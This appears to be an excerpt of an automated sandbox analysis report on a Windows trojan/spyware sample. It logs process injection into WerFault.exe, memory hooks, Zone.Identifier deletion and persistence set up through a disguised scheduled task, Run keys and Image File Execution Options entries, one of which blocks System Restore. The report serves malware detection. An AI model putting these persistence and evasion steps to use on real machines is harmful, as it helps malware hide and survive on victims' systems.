                      Source: unknown | Process created: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02863D40 LookupPrivilegeValueA,AdjustTokenPrivileges,FindCloseChangeNotification
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
                      Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@9/1@48/2
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028802BF CreateToolhelp32Snapshot,Process32FirstW,Process32NextW
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: BbbEtaIxAU.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02898A21 push cs; retf 4_2_02898AA8
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02895BFC push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02895898 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_0289581C push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02895814 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02895824 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02895788 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02898683 push es; iretd 4_2_028986F6
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02890694 push 00000000h; ret 4_2_02890699
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028906AC push 00000000h; ret 4_2_028906B1
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028906B4 push 00000000h; ret 4_2_028906B9
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028906E0 push 00000000h; ret 4_2_02890699
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_0289A603 push es; retf 4_2_0289A616
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02895710 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02895CDC push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02895DA0 push 55555555h; ret 4_2_02895DE6
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A95BFC push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A98A21 push cs; retf 5_2_03A98AA8
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A95898 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A95824 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A9581C push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A95814 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A95858 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A957B8 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A95788 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A95710 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A906AC push 00000000h; ret 5_2_03A906B1
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A906B4 push 00000000h; ret 5_2_03A906B9
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A98683 push es; iretd 5_2_03A986F6
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028664BF LoadLibraryA,LoadLibraryA,GetProcAddress
                      Source: BbbEtaIxAU.exe | Static PE information: real checksum: 0x10d86 should be: 0x28166
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | PE file moved: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yvneslhpc.exe DisableExceptionChainValidation
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHEST
                      Source: C:\Windows\SysWOW64\WerFault.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe Debugger
                      Source: C:\Windows\SysWOW64\WerFault.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Quicktime 8.5.1

                      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 2904 base: 770D77F0 value: 68 D8 FB AC 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 4588 base: 770D77F0 value: 68 D8 FB 39 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 2888 base: 770D77F0 value: 68 D8 FB BC 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 2892 base: 770D77F0 value: 68 D8 FB 55 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 4756 base: 770D77F0 value: 68 D8 FB 7E 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 4700 base: 770D77F0 value: 68 D8 FB B8 02 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 3208 base: 770D77F0 value: 68 D8 FB 4F 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 3232 base: 770D77F0 value: 68 D8 FB 5A 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 4964 base: 770D77F0 value: 68 D8 FB FD 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 2964 base: 770D77F0 value: 68 D8 FB 45 01 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 4720 base: 770D77F0 value: 68 D8 FB F5 01 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 2872 base: 770D77F0 value: 68 D8 FB 85 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 4728 base: 770D77F0 value: 68 D8 FB B4 03 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 2296 base: 770D77F0 value: 68 D8 FB C9 01 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 4648 base: 770D77F0 value: 68 D8 FB 51 01 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 4636 base: 770D77F0 value: 68 D8 FB 68 01 C3
Source: C:\Windows\SysWOW64\WerFault.exe	Memory written: PID: 4596 base: 770D77F0 value: 68 D8 FB 21 01 C3
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	File opened: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe:Zone.Identifier read attributes | delete
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	File opened: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
